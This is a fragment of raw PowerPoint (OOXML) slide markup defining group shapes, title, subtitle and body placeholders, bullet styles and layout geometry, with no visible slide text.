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9" name="Shape 2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4" name="Shape 344"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="Shape 3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6" name="Shape 3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1" name="Shape 3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0" name="Shape 370"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="Shape 3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2" name="Shape 3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2" name="Shape 3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8" name="Shape 388"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="Shape 3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0" name="Shape 39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6" name="Shape 396"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="Shape 3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8" name="Shape 3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3" name="Shape 403"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Shape 4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5" name="Shape 4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4" name="Shape 414"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="Shape 4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6" name="Shape 4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0" name="Shape 420"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Shape 4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2" name="Shape 4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5" name="Shape 435"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Shape 4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7" name="Shape 4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3" name="Shape 4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6" name="Shape 456"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="Shape 4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8" name="Shape 4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6" name="Shape 476"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Shape 4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8" name="Shape 4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5" name="Shape 495"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="Shape 4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7" name="Shape 4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1" name="Shape 501"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="Shape 5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3" name="Shape 5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7" name="Shape 507"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="Shape 508"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="685800" x="1143212"/>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9" name="Shape 5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4" name="Shape 514"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Shape 5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6" name="Shape 5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0" name="Shape 520"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="521" name="Shape 5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2" name="Shape 5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1" name="Shape 541"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="Shape 5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3" name="Shape 5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7" name="Shape 567"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568" name="Shape 5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9" name="Shape 5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3" name="Shape 573"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="Shape 5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5" name="Shape 5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9" name="Shape 579"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="580" name="Shape 5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1" name="Shape 5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5" name="Shape 585"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="586" name="Shape 5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7" name="Shape 5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1" name="Shape 591"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="592" name="Shape 5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3" name="Shape 5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7" name="Shape 597"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598" name="Shape 5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9" name="Shape 5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3" name="Shape 603"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="604" name="Shape 6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5" name="Shape 6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9" name="Shape 609"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="610" name="Shape 6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1" name="Shape 6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5" name="Shape 615"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="616" name="Shape 6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7" name="Shape 6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2" name="Shape 622"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="623" name="Shape 6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4" name="Shape 6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9" name="Shape 629"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="630" name="Shape 6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1" name="Shape 6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5" name="Shape 635"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="Shape 6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7" name="Shape 6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1" name="Shape 641"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="642" name="Shape 6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3" name="Shape 6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7" name="Shape 647"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="648" name="Shape 6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9" name="Shape 6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3" name="Shape 653"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="654" name="Shape 6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5" name="Shape 6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9" name="Shape 659"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="660" name="Shape 6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1" name="Shape 6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5" name="Shape 665"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="666" name="Shape 6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7" name="Shape 6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1" name="Shape 671"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="Shape 6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3" name="Shape 6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7" name="Shape 677"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="678" name="Shape 6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9" name="Shape 6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3" name="Shape 683"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684" name="Shape 6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5" name="Shape 6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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="Shape 60"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off y="1334226" x="-11"/>
            <a:ext cy="4116299" cx="7314320"/>
            <a:chOff y="1378676" x="-11"/>
            <a:chExt cy="4116299" cx="7314320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="Shape 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off y="1378676" x="-11"/>
              <a:ext cy="4116299" cx="187800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr bIns="45700" rIns="91425" lIns="91425" tIns="45700" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:t/>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Shape 62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off y="1378676" x="187809"/>
              <a:ext cy="4116299" cx="71264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63" name="Shape 63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2266575" x="685800"/>
            <a:ext cy="1333799" cx="6400799"/>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9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Shape 64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3600451" x="685800"/>
            <a:ext cy="900599" cx="6400799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1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2400" i="0">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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="Shape 66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off y="-12188" x="-13"/>
            <a:ext cy="1612601" cx="8005727"/>
            <a:chOff y="-12187" x="-13"/>
            <a:chExt cy="1161900" cx="8005727"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="Shape 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off y="-12187" x="-13"/>
              <a:ext cy="1161900" cx="187800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr bIns="45700" rIns="91425" lIns="91425" tIns="45700" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:t/>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="Shape 68"/>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69" name="Shape 69"/>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Shape 70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1704688" x="457200"/>
            <a:ext cy="4840199" cx="8229600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:defRPr baseline="0" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr algn="l" rtl="0">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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Shape 72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1704684" x="456245"/>
            <a:ext cy="4840199" cx="4038599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0"/>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Shape 73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1704684" x="4648200"/>
            <a:ext cy="4840199" cx="4038599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0"/>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p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="74" name="Shape 74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off y="-12188" x="-13"/>
            <a:ext cy="1612601" cx="8005727"/>
            <a:chOff y="-12187" x="-13"/>
            <a:chExt cy="1161900" cx="8005727"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="Shape 75"/>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76" name="Shape 76"/>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77" name="Shape 77"/>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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="79" name="Shape 79"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off y="-12188" x="-13"/>
            <a:ext cy="1612601" cx="8005727"/>
            <a:chOff y="-12187" x="-13"/>
            <a:chExt cy="1161900" cx="8005727"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="80" name="Shape 80"/>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81" name="Shape 81"/>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82" name="Shape 82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="134801" x="457200"/>
            <a:ext cy="1351799" cx="7315499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" t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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Shape 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="6165014" x="8964665"/>
            <a:ext cy="6951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85" name="Shape 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="6165014" x="3866777"/>
            <a:ext cy="695100" cx="5097900"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Shape 86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6165014" x="3866812"/>
            <a:ext cy="695100" cx="5097900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
